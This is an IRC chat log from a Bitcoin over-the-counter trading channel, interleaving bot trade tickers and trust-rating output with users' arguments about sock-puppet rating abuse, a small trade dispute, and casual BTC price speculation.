26 23:42:20 he will probably get banned soon Sep 26 23:42:30 and the ratings will stioll be there Sep 26 23:42:37 Yeah, I dont consider something where you can rate yourself 'working' :P Sep 26 23:42:38 Ignatius-otc ofcourse Sep 26 23:42:51 Luceo, its not rating yourself Sep 26 23:42:52 Luceo don't think in numeric terms. the links matter more. Sep 26 23:42:54 this is why you use gettrust and not getrating Sep 26 23:42:56 or -50 someone from a bunch of socks Sep 26 23:42:59 its creating multiple identities to rate yoursel Sep 26 23:43:01 nobody cares someone has 1590809568 ratings from unknown people Sep 26 23:43:07 there's nothing you can do to stop false identities Sep 26 23:43:38 Trust relationship from user usagi to user luceo: Level 1: 5, Level 2: 4 via 3 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=usagi&dest=luceo Sep 26 23:43:49 [GLBSE] [FPGAMINING] 7 @ 0.4074997 = 2.8525 BTC [-] Sep 26 23:44:05 I agree most people look at the rating themselves and the raters, as copumpkin said gettrust is awesome. but to then forget that anyone can become well rated then decide to scam big time is silly, and it isnt a working system of trust Sep 26 23:44:24 ;;getrating pirateat40 Sep 26 23:44:24 WARNING: Currently not authenticated. User pirateat40, rated since Mon Aug 1 14:18:45 2011. Cumulative rating -46, from 92 total ratings. Received ratings: 61 positive, 31 negative. Sent ratings: 65 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40 Sep 26 23:44:59 Ignatius-otc: what do you propose? Sep 26 23:45:00 [GLBSE] [FPGAMINING] 4 @ 0.4074997 = 1.63 BTC [-] Sep 26 23:45:28 I have no better ideas copumkin, dont misunderstand. I appreciate the wot and for me so far it has gone well, no scams Sep 26 23:45:48 but if we promote is an infallible thats a huge stretch Sep 26 23:46:02 [GLBSE] [BFLS] 3 @ 0.32001 = 0.96 BTC [-] Sep 26 23:46:03 [GLBSE] [BFLS] 10 @ 0.32 = 3.2 BTC [-] Sep 26 23:46:11 mircea_popescu: The links would matter more IF people used gettrust instead of getrating Sep 26 23:46:26 Ignatius-bot its not "infallible". its just a tool. Sep 26 23:46:38 Luceo people do. Sep 26 23:47:08 mircea_popescu: Very few, I rarely get 'gettrust'ed Sep 26 23:47:11 [GLBSE] [OBSI.HRPT] 6 @ 0.06498 = 0.3899 BTC [+] Sep 26 23:47:27 ;;gettrust luceo Sep 26 23:47:28 Trust relationship from user Ignatius-otc to user luceo: Level 1: 0, Level 2: 4 via 4 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=Ignatius-otc&dest=luceo Sep 26 23:47:30 [GLBSE] [GIGAMINING] 3 @ 0.56831 = 1.7049 BTC [-] Sep 26 23:47:32 [GLBSE] [GIGAMINING] 1 @ 0.5683 BTC [-] Sep 26 23:47:33 [GLBSE] [GIGAMINING] 2 @ 0.568 = 1.136 BTC [-] Sep 26 23:47:33 Luceo you know it works in pms with gribble too Sep 26 23:47:36 you wouldn't necessarily know. Sep 26 23:47:43 [MPEX] [S.MPOE] 5295 @ 0.00036379 = 1.9263 BTC [+] Sep 26 23:49:34 mircea_popescu: Well they usually getrating in public :P Sep 26 23:49:51 [GLBSE] [NASTY] 2 @ 0.367 = 0.734 BTC [-] Sep 26 23:49:52 [GLBSE] [NASTY] 2 @ 0.3508 = 0.7016 BTC [-] Sep 26 23:49:53 [GLBSE] [NASTY] 11 @ 0.35061 = 3.8567 BTC [-] Sep 26 23:49:54 [GLBSE] [NASTY] 2 @ 0.35051 = 0.701 BTC [-] Sep 26 23:49:55 [GLBSE] [NASTY] 2 @ 0.3505 = 0.701 BTC [-] Sep 26 23:49:57 [GLBSE] [NASTY] 4 @ 0.3502 = 1.4008 BTC [-] Sep 26 23:49:58 [GLBSE] [NASTY] 1 @ 0.31911999 BTC [-] Sep 26 23:50:01 i usually check in the web interface when i do Sep 26 23:50:12 there's many avenues Sep 26 23:50:17 [GLBSE] [COGNITIVE] 1 @ 0.3023 BTC [-] Sep 26 23:50:18 [GLBSE] [COGNITIVE] 1 @ 0.30200001 BTC [-] Sep 26 23:50:20 [GLBSE] [COGNITIVE] 1 @ 0.302 BTC [-] Sep 26 23:50:21 [GLBSE] [COGNITIVE] 1 @ 0.3017 BTC [-] Sep 26 23:50:23 [GLBSE] [COGNITIVE] 13 @ 0.3016 = 3.9208 BTC [-] Sep 26 23:50:24 [GLBSE] [COGNITIVE] 10 @ 0.3015 = 3.015 BTC [-] Sep 26 23:50:25 [GLBSE] [COGNITIVE] 1 @ 0.301 BTC [-] Sep 26 23:50:29 [GLBSE] [FPGAMINING] 1 @ 0.40989999 BTC [+] Sep 26 23:50:30 [GLBSE] [FPGAMINING] 2 @ 0.4099 = 0.8198 BTC [+] Sep 26 23:50:32 [GLBSE] [FPGAMINING] 9 @ 0.41 = 3.69 BTC [+] Sep 26 23:51:19 You rated user eskimobob on Mon Sep 24 11:51:24 2012, giving him a rating of -2, and supplied these additional notes: broke his word on a contract. untrustworthy and a bit of a jerk.. Sep 26 23:51:31 [GLBSE] [FPGAMINING] 3 @ 0.41 = 1.23 BTC [+] Sep 26 23:51:32 [GLBSE] [FPGAMINING] 1 @ 0.42 BTC [+] Sep 26 23:51:34 [GLBSE] [FPGAMINING] 2 @ 0.44 = 0.88 BTC [+] Sep 26 23:52:10 [GLBSE] [FPGAMINING] 1 @ 0.44 BTC [+] Sep 26 23:52:24 ;;rate FabianB 1 "bravest brokerage betatester" Sep 26 23:52:25 Rating entry successful. Your rating of 1 for user FabianB has been recorded. Sep 26 23:52:37 Rating entry successful. Your rating for user EskimoBob has changed from -2 to -4. Sep 26 23:52:40 [GLBSE] [FUTUREFUND] 1 @ 0.000125 BTC [+] Sep 26 23:53:31 heh, thanks jurov, coinbr looks great so far Sep 26 23:53:41 Rating entry successful. Your rating for user EskimoBob has changed from -4 to -4. Sep 26 23:53:42 will continue testing over next days Sep 26 23:54:17 s/testing/trading/ :) Sep 26 23:55:04 testing coinbr by trading :) Sep 26 23:56:16 ;;unrate EskimoBob Sep 26 23:56:17 Successfully removed your rating for EskimoBob. Sep 26 23:57:36 EskimoBob lend me a bitcoin. Sep 26 23:57:54 [GLBSE] [GIGAMINING] 5 @ 0.56700001 = 2.835 BTC [-] Sep 26 23:57:56 [GLBSE] [MERGEDMINING] 2 @ 0.06 = 0.12 BTC [-] Sep 26 23:57:57 [GLBSE] [MERGEDMINING] 4 @ 0.0585 = 0.234 BTC [-] Sep 26 23:57:58 [GLBSE] [MERGEDMINING] 3 @ 0.057 = 0.171 BTC [-] Sep 26 23:59:18 mircea_popescu: why? Sep 26 23:59:26 is there a BFL type asset on the market? Sep 26 23:59:57 EskimoBob mostly cause i don't appreciate the bs wot abuse going on. Sep 26 23:59:58 Luceo: thank you for showing me that your rating is meaningless Sep 27 00:00:03 [GLBSE] [FPGAMINING] 4 @ 0.44 = 1.76 BTC [+] Sep 27 00:00:04 [GLBSE] [FPGAMINING] 1 @ 0.45 BTC [+] Sep 27 00:00:26 19gYdzkfeBiaUseTZVpga9F81fz1Si2Wez Sep 27 00:00:38 wtf are you talking about mircea_popescu? Sep 27 00:00:49 go fuck yourself. You are good at it Sep 27 00:00:53 ;;getrating EskimoBob Sep 27 00:00:54 WARNING: Currently not authenticated. User eskimobob, rated since Sat Jun 4 09:35:57 2011. Cumulative rating -2, from 3 total ratings. Received ratings: 2 positive, 1 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=eskimobob Sep 27 00:00:59 EskimoBob: My rating said that you successfully traded with usagi, I can't hold that rating can I? Sep 27 00:01:04 dude, I take you off the ignore and this is what you come up with Sep 27 00:01:09 dude's not very bright is he. i take him off ignore to help him out. sigh. Sep 27 00:01:14 EskimoBob!*@* added to ignore list. Sep 27 00:01:30 mircea_popescu: I'm not abusing the bot :( Sep 27 00:01:38 wasn't talking about you. Sep 27 00:01:46 [GLBSE] [FPGAMINING] 1 @ 0.45 BTC [+] Sep 27 00:02:14 EskimoBob: Yes, did he get the other service which you sold him? Sep 27 00:02:36 EskimoBob: If you buy a server and a domain from me, and I deliver only the server, have I successfully traded with you or not? Sep 27 00:03:29 I said already yes Sep 27 00:04:51 .... Sep 27 00:05:06 For the THIRD time Sep 27 00:05:08 Yes Sep 27 00:05:37 Yes Sep 27 00:06:06 Wait Sep 27 00:06:15 You didn't send coin. You received coin. Sep 27 00:06:24 I read that as 'for me' Sep 27 00:06:28 Not 'from me' Sep 27 00:06:53 No, there were no excuses. The coin and shares transferred flawlessly. Sep 27 00:07:17 But that wasn't the whole contract, was it? Sep 27 00:07:32 yes or no Sep 27 00:07:44 usagi didn't just offer to buy shares at 50% above their trade value for no reason Sep 27 00:08:12 A lot of people witnessed the implied contract Sep 27 00:08:23 Lyspooner im sory, you got drowned in the drama Sep 27 00:08:25 No, you didn't. He repeatedly added that the deal was you had to stfu Sep 27 00:08:25 what was the q ? Sep 27 00:08:41 oh no, nothing, this is fun Sep 27 00:08:54 lol another lost soul Sep 27 00:09:31 You said that AFTER the trade finished Sep 27 00:11:34 My perception isn't particularly important, Maged has ruled that you need to refund the difference Sep 27 00:11:40 [GLBSE] [GIGAMINING] 15 @ 0.567 = 8.505 BTC [-] Sep 27 00:13:29 [MPEX] [S.MPOE] 4605 @ 0.00036131 = 1.6638 BTC [-] Sep 27 00:13:29 [MPEX] [S.MPOE] 19722 @ 0.00036398 = 7.1784 BTC [+] Sep 27 00:14:23 "decide this case"? Is this about a scammer tag? Sep 27 00:14:37 For you? Sep 27 00:14:39 [GLBSE] [FPGAMINING] 3 @ 0.45 = 1.35 BTC [+] Sep 27 00:14:41 [GLBSE] [FPGAMINING] 4 @ 0.451 = 1.804 BTC [+] Sep 27 00:14:42 [GLBSE] [FPGAMINING] 8 @ 0.45215899 = 3.6173 BTC [+] Sep 27 00:14:42 [GLBSE] [SILVER] 5 @ 0.00994 = 0.0497 BTC [+] Sep 27 00:15:48 [GLBSE] [FPGAMINING] 1 @ 0.45215899 BTC [+] Sep 27 00:15:49 [GLBSE] [FPGAMINING] 2 @ 0.49178 = 0.9836 BTC [+] Sep 27 00:17:39 EskimoBob: lol? Why would I need to be told how to think? You clearly broke the agreement you made Sep 27 00:17:42 [GLBSE] [ASICMINER] 10 @ 0.102112 = 1.0211 BTC [+] Sep 27 00:17:43 [GLBSE] [ASICMINER] 2 @ 0.102111 = 0.2042 BTC [-] Sep 27 00:17:44 [GLBSE] [ASICMINER] 14 @ 0.1011 = 1.4154 BTC [-] Sep 27 00:17:45 [GLBSE] [ASICMINER] 79 @ 0.1001 = 7.9079 BTC [-] Sep 27 00:17:55 I suggest any doubters read the IRC log Sep 27 00:18:12 EskimoBob: Is there some thread somewhere that I can read without wading through a bunch of crappy garbage and whining? :) Sep 27 00:18:38 k, thanks EB. Sep 27 00:19:11 okie doke. Sep 27 00:30:54 [GLBSE] [GSDPT] 3914 @ 0.0033994 = 13.3053 BTC [+] Sep 27 00:35:34 [GLBSE] [MOORE] 1 @ 0.5 BTC [-] Sep 27 00:38:39 [MPEX] [S.MPOE] 4900 @ 0.00036398 = 1.7835 BTC [+] Sep 27 00:39:57 [GLBSE] [ASICMINER] 1 @ 0.1001 BTC [-] Sep 27 00:40:51 [GLBSE] [ASICMINER] 39 @ 0.09999999 = 3.9 BTC [-] Sep 27 00:42:31 in before $14 Sep 27 00:43:47 ;;ticker Sep 27 00:43:48 Best bid: 12.41, Best ask: 12.4102, Bid-ask spread: 0.00020, Last trade: 12.41, 24 hour volume: 23283, 24 hour low: 12.02, 24 hour high: 12.4102 Sep 27 00:43:52 a ways to go Sep 27 00:43:59 lol Sep 27 00:44:09 in at $2.65 Sep 27 00:47:26 I'd much rather see $2.65 than $14 Sep 27 00:47:52 watch for pirate instapayout Sep 27 00:48:01 riight Sep 27 00:48:02 That is going to take some serious legal threats Sep 27 00:48:44 $2.65, not pirate... Sep 27 00:49:06 why? he buys back in at $2, settles and walks away rich Sep 27 00:49:27 right. Sep 27 00:49:36 Gotta get to $2 first Sep 27 00:49:40 Not happening again Sep 27 00:49:50 unless a real crisis hits Sep 27 00:50:09 Common... I want 2$ bitcoins... Sep 27 00:50:32 I don't believe in technical analysis, but damn does the BTC/$ chart look strong. Sep 27 00:52:16 Bugpowder true. Sep 27 00:52:40 i was expecting soem dip on the sec news. but nope Sep 27 00:52:43 [GLBSE] [PUREMINING] 1 @ 0.1036 BTC [+] Sep 27 00:52:54 Capital flight Sep 27 00:53:03 The real killer ap Sep 27 00:53:20 I gotta get more into coins before euro blows up Sep 27 00:53:55 prolly Sep 27 00:54:06 tho im pretty sure usd blows before eur Sep 27 00:54:10 lol Sep 27 00:54:12 no way Sep 27 00:54:19 reserve currency Sep 27 00:54:27 usd blows up last Sep 27 00:54:49 God US Treasuries are going to spike when the shit goes down Sep 27 00:54:52 Then collapse Sep 27 00:54:54 [GLBSE] [MERGEDMINING] 1 @ 0.06494993 BTC [+] Sep 27 00:55:25 Interesting action with TLT... QE3 comes out and TLT just keeps going up Sep 27 00:55:31 yields way down again Sep 27 00:56:02 [GLBSE] [MERGEDMINING] 3 @ 0.06494994 = 0.1948 BTC [+] Sep 27 00:57:10 I've heard 'they can't get lower' so many times... Long bond yields were rock bottom for decades in 30s-50s. Sep 27 00:58:41 I definitly need to get more into Bitcoin Sep 27 00:58:56 what % do you have in coin? Sep 27 00:59:06 % fo what ? Sep 27 00:59:13 fo real. Sep 27 00:59:19 total net worth Sep 27 00:59:38 [GLBSE] [SILVER] 5 @ 0.00994 = 0.0497 BTC [+] Sep 27 00:59:41 I mean.. uh.. Sep 27 01:00:01 Somewhere around... 146% Sep 27 01:00:15 wat Sep 27 01:00:17 lol Sep 27 01:00:34 eh under 10% Sep 27 01:00:36 I have fiat loans turned into BTC =/ Sep 27 01:00:42 might be time to take some profits BTC-Mining Sep 27 01:00:51 i have nfi but its approaching 0% Sep 27 01:01:05 .. yeah, that doesn't look much like contract at all. It looks to me like "Here's the deal, i'll buy back iff" then "I send shares, you send coins" "do you agree not to shittalk me?" "yes", then "fuck off". it's wayy too slippery to state with finality. There is no agreed contract, there's interference between the action of the trade and the agreement most germane to the trade. The restatement of terms by EB means you were Sep 27 01:01:11 both agreeing to totally different contracts. And now you both get to argue with one another until the end of time. Sep 27 01:01:41 Can we put that 5BTC joke of a discussion in a different channel? Sep 27 01:01:48 BTC appreciates much faster than interests on fiat loans... Sep 27 01:01:49 ++ Sep 27 01:02:04 the "how many time do you need me to tell you yes" was a restatement of his earlier "yes"es which were his own idea of the contract. Sep 27 01:02:06 Not only that, but you can make good returns trading in BTC on top of it. Sep 27 01:02:16 [MPEX] [O.BTCUSD.C140T] 20 @ 0.03266244 = 0.6532 BTC [-] Sep 27 01:02:22 [GLBSE] [BMF] 20 @ 0.50999 = 10.1998 BTC [+] Sep 27 01:02:43 [GLBSE] [ASICMINER] 2 @ 0.1089 = 0.2178 BTC [+] Sep 27 01:02:45 [GLBSE] [ASICMINER] 2 @ 0.10999999 = 0.22 BTC [+] Sep 27 01:02:46 [GLBSE] [ASICMINER] 100 @ 0.11 = 11 BTC [+] Sep 27 01:02:49 All these finance assholes chasing yield... None of them buying bitcoins. Seems like a no brainer. Sep 27 01:02:51 BTC-Mining it;'s just not very prudent Sep 27 01:03:24 [GLBSE] [MOORE] 1 @ 0.5 BTC [-] Sep 27 01:03:29 Eh, maybe not. Sep 27 01:03:46 meanwhile, out of context: [06:07:17] Eskimobob. yes or no. final offer. Are you going to shut the fuck up about me and my businesses from now? If you agree, I'll buy you out at .53 a share. Right now. Sep 27 01:03:48 midnightmagic: best to let what happens in the sandpit at the special kindergarten stay there? Sep 27 01:03:49 But the worth has grown so much I can handle large BTC losses Sep 27 01:03:54 then: [06:07:41] usagi: HOW MANY TIMES DO YOU NEED ME TO TELL YOU "YES"? Sep 27 01:04:17 dub: It's hilarious is all. Sep 27 01:04:36 I guess im burned out on hilarity Sep 27 01:04:43 dub: The problem I have is that Maged is considering this at all. Sep 27 01:04:45 It's 2 kids arguing over lunch money a recess. Not that interesting Sep 27 01:05:07 midnightmagic: maged is a problem for me too Sep 27 01:05:19 BTC-Mining suppose tomorrow btc is gone. Sep 27 01:05:36 he's the kid that isnt allowed in the sandpit because he keeps pooping in the sand then eating sandy poop Sep 27 01:05:42 midnightmagic maged is in a shit position, he has to consider idiots. Sep 27 01:05:44 or suppose mtgox gets shut down Sep 27 01:05:50 Eh, would be bad, but not the end of the world. Sep 27 01:06:01 suppose US gov flexes and kills all major exchanges Sep 27 01:06:04 [GLBSE] [BIB.BVPS] 2 @ 0.00389 = 0.0078 BTC [-] Sep 27 01:06:06 that will fuck you Sep 27 01:06:12 Bugpowder not rly. Sep 27 01:06:21 atm exchanges closing would drive prices up Sep 27 01:06:37 I disagree Sep 27 01:06:44 can't get the cash in Sep 27 01:06:48 yes you can. Sep 27 01:06:55 localbitcoins.com? Sep 27 01:06:57 i neve bought on an exchange, and i bought a shitton Sep 27 01:07:40 thing is, it would create huge publicirty, and thus drive demand way up Sep 27 01:07:46 + some people'd just not sell Sep 27 01:07:51 so upward pressure. Sep 27 01:07:57 I think the uncertainty and difficulty getting more cash in, would cause downward pressure Sep 27 01:08:08 few people actually have to sell btc. Sep 27 01:08:21 market needs fresh n00bs to put coins in Sep 27 01:08:26 err $$$ in Sep 27 01:08:43 much easier with gox Sep 27 01:08:59 not sure the bitcoin ecosystem is robust enough without the exchange points Sep 27 01:09:02 this is kinda false. Sep 27 01:09:15 online poker is pretty dead in the us Sep 27 01:09:17 but hey, im sure eventually we'll find out Sep 27 01:09:19 mircea_popescu: He should be telling them both to go pound and stop wasting his time rather than trying to write legalese and look into business records. Sep 27 01:09:29 Bugpowder are you klidding ? every american i know plays poker. Sep 27 01:09:43 only grandfathered people Sep 27 01:09:49 also Sep 27 01:10:03 midnightmagic true. if i was in his place i would do exactly that. then people would whine about how much of an asshole i am. Sep 27 01:10:39 poker was massive 5 years ago, it probably will be again once gov legalizes and taxes it. Senator who was blocking legislation is retiring Sep 27 01:10:49 [GLBSE] [MU] 1 @ 0.18999999 BTC [+] Sep 27 01:10:51 [GLBSE] [MU] 1 @ 0.19 BTC [+] Sep 27 01:10:56 poker is massive in europe now I guess Sep 27 01:12:14 mircea_popescu: lol that would be awesome. Sep 27 01:12:53 Bugpowder more convenient example : pot. Sep 27 01:13:08 pot has never been as big before it became a controlled substance as it was after. Sep 27 01:15:23 [GLBSE] [COGNITIVE] 1 @ 0.27999999 BTC [-] Sep 27 01:19:49 [GLBSE] [CPA] 1 @ 0.04000001 BTC [-] Sep 27 01:23:04 [GLBSE] [YABMC] 1 @ 0.07899998 BTC [+] Sep 27 01:24:05 [GLBSE] [YABMC] 1 @ 0.07899999 BTC [+] Sep 27 01:27:25 [MPEX] [S.MPOE] 35578 @ 0.00036398 = 12.9497 BTC [+] Sep 27 01:27:27 [MPEX] [S.MPOE] 922 @ 0.00036439 = 0.336 BTC [+] Sep 27 01:30:16 [GLBSE] [COGNITIVE] 1 @ 0.372 BTC [+] Sep 27 01:31:11 Things like what happened in the previous day, like my passport being posted all over this forum and reddit be nefario himself are a shame, and a crime in my jurisdiction. Sep 27 01:31:22 i haven't signed any document allowing him to post my passport copy all over the place. Sep 27 01:31:28 dun dun. Sep 27 01:32:01 where is this from Sep 27 01:32:08 no shit Sep 27 01:32:24 BDT thread I assume? Sep 27 01:32:31 https://bitcointalk.org/index.php?topic=93445.msg1221152#msg1221152 Sep 27 01:32:49 i was having fun reading rosenfeld's attempts to disentangle himself. Sep 27 01:40:37 it's a pity really the legal profession doesn't know about the internet. they could make a lot of money consulting here. Sep 27 01:45:15 [GLBSE] [YABMC] 1 @ 0.07899999 BTC [+] Sep 27 01:46:31 I assure you they are making more money elsewhere than could be extracted from this dispute Sep 27 01:46:41 o, you think ? Sep 27 01:47:06 Depends on the lawyer I guess Sep 27 01:47:12 patent litigator Sep 27 01:47:20 vs. DUI lawyer Sep 27 01:47:24 and here i go thinking random forum replete with random idiots is the center of the world Sep 27 01:47:30 i must have been wrong or something. Sep 27 01:47:54 lot of out of work lawyers these days though Sep 27 01:48:04 we just need one of them to get interested in the subject Sep 27 01:48:17 im guessing i need to start putting sarcasm tags in Sep 27 01:48:20 5BTC defamation contract breech Sep 27 01:48:39 you get 40% fee if you win the case Sep 27 01:49:08 that could be 3 million $ if bitcoin commerce gets up to $1T Sep 27 01:49:09 in internet court! Sep 27 01:52:13 later dudes Sep 27 01:52:25 [GLBSE] [ASICMINER] 1000 @ 0.109 = 109 BTC [-] Sep 27 01:52:27 [GLBSE] [ASICMINER] 3 @ 0.106 = 0.318 BTC [-] Sep 27 01:52:28 [GLBSE] [ASICMINER] 7 @ 0.10000001 = 0.7 BTC [-] Sep 27 01:52:29 [GLBSE] [ASICMINER] 200 @ 0.1 = 20 BTC [-] Sep 27 01:52:55 [MPEX] [F.GIGA.ETF] 1300 @ 0.00044037 = 0.5725 BTC [+] Sep 27 01:52:56 [MPEX] [F.GIGA.ETF] 573 @ 0.00044037 = 0.2523 BTC [+] Sep 27 01:52:58 [MPEX] [F.GIGA.ETF] 1473 @ 0.00044037 = 0.6487 BTC [+] Sep 27 01:52:59 [MPEX] [F.GIGA.ETF] 3354 @ 0.00044037 = 1.477 BTC [+] Sep 27 01:54:40 I will not comment much about my involvement with other scams, i had involvement in some projects prior to BDT, as you must be aware, but if you are insinuating that i am a scammer you must have evidences to back up your claims, and if you ever want to end up in court, they must be really solid. Sep 27 01:55:02 so bitscalper is realsolid, I knew it Sep 27 01:55:55 is he ? Sep 27 01:56:07 nah Sep 27 01:56:36 [GLBSE] [RAREEARTH] 2 @ 0.0099 = 0.0198 BTC [-] Sep 27 01:56:40 so i walked into a bar today to meet with shakaru Sep 27 01:56:45 and there at a table was pirate Sep 27 01:56:52 we had a jolly good time. Sep 27 01:57:13 yo ho ho and a bottle of rum Sep 27 02:03:23 [GLBSE] [ASICMINER] 2 @ 0.101 = 0.202 BTC [+] Sep 27 02:03:24 [GLBSE] [ASICMINER] 70 @ 0.1 = 7 BTC [-] Sep 27 02:03:25 [GLBSE] [ASICMINER] 261 @ 0.09999999 = 26.1 BTC [-] Sep 27 02:03:26 [GLBSE] [ASICMINER] 3 @ 0.09999999 = 0.3 BTC [-] Sep 27 02:07:38 [GLBSE] [MOORE] 1 @ 0.5 BTC [-] Sep 27 02:16:54 it's relevant because it's indicative of the other information being hidden Sep 27 02:17:03 lol Sep 27 02:18:01 [MPEX] [S.MPOE] 23770 @ 0.00036128 = 8.5876 BTC [-] Sep 27 02:18:02 [MPEX] [S.MPOE] 21700 @ 0.00036043 = 7.8213 BTC [-] Sep 27 02:18:04 [MPEX] [S.MPOE] 20930 @ 0.00036025 = 7.54 BTC [-] Sep 27 02:24:05 [GLBSE] [MOORE] 1 @ 0.501 BTC [+] Sep 27 02:26:24 [GLBSE] [BIT.INC] 3 @ 0.09 = 0.27 BTC [-] Sep 27 02:33:12 [GLBSE] [SILVER] 5 @ 0.00999 = 0.05 BTC [+] Sep 27 02:34:32 [GLBSE] [GOLD] 5 @ 0.00999998 = 0.05 BTC [+] Sep 27 02:34:51 [GLBSE] [FPGAMINING] 5 @ 0.42 = 2.1 BTC [-] Sep 27 02:35:25 [GLBSE] [FPGAMINING] 2 @ 0.47 = 0.94 BTC [+] Sep 27 02:35:58 [GLBSE] [RAREEARTH] 20 @ 0.01 = 0.2 BTC [+] Sep 27 02:37:23 [GLBSE] [PLATINUM] 30 @ 0.00999999 = 0.3 BTC [+] Sep 27 02:39:04 [GLBSE] [NYAN.A] 3 @ 0.9902 = 2.9706 BTC [+] Sep 27 02:40:17 [GLBSE] [OBSI.HRPT] 1 @ 0.06 BTC [-] Sep 27 02:41:47 [GLBSE] [YABIF] 7 @ 0.9 = 6.3 BTC [-] Sep 27 02:43:16 [GLBSE] [PAJKA.BOND] 3 @ 0.0824 = 0.2472 BTC [+] Sep 27 02:43:17 [MPEX] [S.MPOE] 16400 @ 0.00036059 = 5.9137 BTC [+] Sep 27 02:58:39 [GLBSE] [NYAN.A] 3 @ 0.9995 = 2.9985 BTC [+] Sep 27 03:00:53 [GLBSE] [GSDPT] 3989 @ 0.0033994 = 13.5602 BTC [+] Sep 27 03:00:54 [GLBSE] [GSDPT] 202 @ 0.0033995 = 0.6867 BTC [+] Sep 27 03:00:55 [GLBSE] [GSDPT] 809 @ 0.0033999 = 2.7505 BTC [+] Sep 27 03:00:57 [GLBSE] [CPA] 39 @ 0.04 = 1.56 BTC [-] Sep 27 03:08:24 [MPEX] [F.GIGA.ETF] 4100 @ 0.00044037 = 1.8055 BTC [+] Sep 27 03:17:09 [GLBSE] [ASICMINER] 2 @ 0.10968 = 0.2194 BTC [+] Sep 27 03:24:34 [GLBSE] [ZETA-MINING] 2 @ 0.18999997 = 0.38 BTC [+] Sep 27 03:27:26 [GLBSE] [GOLD] 5 @ 0.00999998 = 0.05 BTC [+] Sep 27 03:30:42 [GLBSE] [CPA] 1 @ 0.033 BTC [-] Sep 27 03:31:42 [GLBSE] [STANDARD.GOLD] 250 @ 0.00005899 = 0.0147 BTC [+] Sep 27 03:33:23 [GLBSE] [GSDPT] 20 @ 0.0033999 = 0.068 BTC [+] Sep 27 03:33:37 [MPEX] [F.GIGA.ETF] 1615 @ 0.00044037 = 0.7112 BTC [+] Sep 27 03:33:38 [MPEX] [F.GIGA.ETF] 3549 @ 0.00044037 = 1.5629 BTC [+] Sep 27 03:33:40 [MPEX] [F.GIGA.ETF] 5836 @ 0.00044037 = 2.57 BTC [+] Sep 27 03:33:44 [GLBSE] [M.ETF] 1 @ 0.11999999 BTC [+] Sep 27 03:36:08 [GLBSE] [BITBOND] 1 @ 0.3598 BTC [+] Sep 27 03:36:22 [GLBSE] [BFLS] 20 @ 0.3 = 6 BTC [-] Sep 27 03:37:52 [GLBSE] [HYDRO.BONDS] 1 @ 1.3959 BTC [+] Sep 27 03:37:54 [GLBSE] [HYDRO.BONDS] 2 @ 1.3979 = 2.7958 BTC [+] Sep 27 03:44:02 [GLBSE] [GIGAMINING] 10 @ 0.56720001 = 5.672 BTC [+] Sep 27 03:47:46 [GLBSE] [GIGAMINING] 4 @ 0.5672 = 2.2688 BTC [-] Sep 27 03:48:38 [GLBSE] [GIGAMINING] 19 @ 0.567 = 10.773 BTC [-] Sep 27 03:49:54 [GLBSE] [GIGAMINING] 2 @ 0.567 = 1.134 BTC [-] Sep 27 03:50:29 [GLBSE] [GIGAMINING] 2 @ 0.5663 = 1.1326 BTC [-] Sep 27 03:50:56 [GLBSE] [GIGAMINING] 4 @ 0.5662 = 2.2648 BTC [-] Sep 27 03:54:12 [GLBSE] [GIGAMINING] 2 @ 0.5613 = 1.1226 BTC [-] Sep 27 03:54:22 [GLBSE] [OBSI.HRPT] 1 @ 0.0540001 BTC [-] Sep 27 03:54:24 [GLBSE] [OBSI.HRPT] 1 @ 0.054 BTC [-] Sep 27 03:54:25 [GLBSE] [OBSI.HRPT] 1 @ 0.051984 BTC [-] Sep 27 03:54:26 [GLBSE] [OBSI.HRPT] 1 @ 0.04899716 BTC [-] Sep 27 03:54:27 [GLBSE] [OBSI.HRPT] 1 @ 0.04602 BTC [-] Sep 27 03:54:28 [GLBSE] [OBSI.HRPT] 2 @ 0.04600001 = 0.092 BTC [-] Sep 27 03:54:29 [GLBSE] [OBSI.HRPT] 3 @ 0.046 = 0.138 BTC [-] Sep 27 03:54:30 [GLBSE] [OBSI.HRPT] 1 @ 0.04539916 BTC [-] Sep 27 03:54:31 [GLBSE] [OBSI.HRPT] 2 @ 0.04539915 = 0.0908 BTC [-] Sep 27 03:54:33 [GLBSE] [OBSI.HRPT] 1 @ 0.04532697 BTC [-] Sep 27 03:54:34 [GLBSE] [OBSI.HRPT] 1 @ 0.04521001 BTC [-] Sep 27 03:54:35 [GLBSE] [OBSI.HRPT] 2 @ 0.04521 = 0.0904 BTC [-] Sep 27 03:54:35 [GLBSE] [OBSI.HRPT] 8 @ 0.04519037 = 0.3615 BTC [-] Sep 27 03:54:36 [GLBSE] [OBSI.HRPT] 9 @ 0.04519036 = 0.4067 BTC [-] Sep 27 03:54:37 [GLBSE] [OBSI.HRPT] 1 @ 0.04519 BTC [-] Sep 27 03:54:38 [GLBSE] [OBSI.HRPT] 2 @ 0.0451758 = 0.0904 BTC [-] Sep 27 03:54:39 [GLBSE] [OBSI.HRPT] 3 @ 0.04517579 = 0.1355 BTC [-] Sep 27 03:54:40 [GLBSE] [OBSI.HRPT] 2 @ 0.04509008 = 0.0902 BTC [-] Sep 27 03:54:42 [GLBSE] [OBSI.HRPT] 1 @ 0.04504 BTC [-] Sep 27 03:54:43 [GLBSE] [OBSI.HRPT] 5 @ 0.04502 = 0.2251 BTC [-] Sep 27 03:54:44 [GLBSE] [OBSI.HRPT] 25 @ 0.045 = 1.125 BTC [-] Sep 27 03:54:44 [GLBSE] [OBSI.HRPT] 1 @ 0.04491 BTC [-] Sep 27 03:54:45 [GLBSE] [OBSI.HRPT] 3 @ 0.04489707 = 0.1347 BTC [-] Sep 27 03:54:46 [GLBSE] [OBSI.HRPT] 2 @ 0.044 = 0.088 BTC [-] Sep 27 03:54:47 [GLBSE] [OBSI.HRPT] 5 @ 0.044 = 0.22 BTC [-] Sep 27 03:54:48 [GLBSE] [OBSI.HRPT] 16 @ 0.043 = 0.688 BTC [-] Sep 27 03:55:34 No one likes OBSI.HRPT? Why? =P Sep 27 03:56:30 [GLBSE] [ZETA-MINING] 6 @ 0.18999993 = 1.14 BTC [-] Sep 27 03:56:32 [GLBSE] [ZETA-MINING] 1 @ 0.18999994 BTC [+] Sep 27 03:56:33 [GLBSE] [ZETA-MINING] 2 @ 0.19 = 0.38 BTC [+] Sep 27 03:57:09 [GLBSE] [OBSI.HRPT] 91 @ 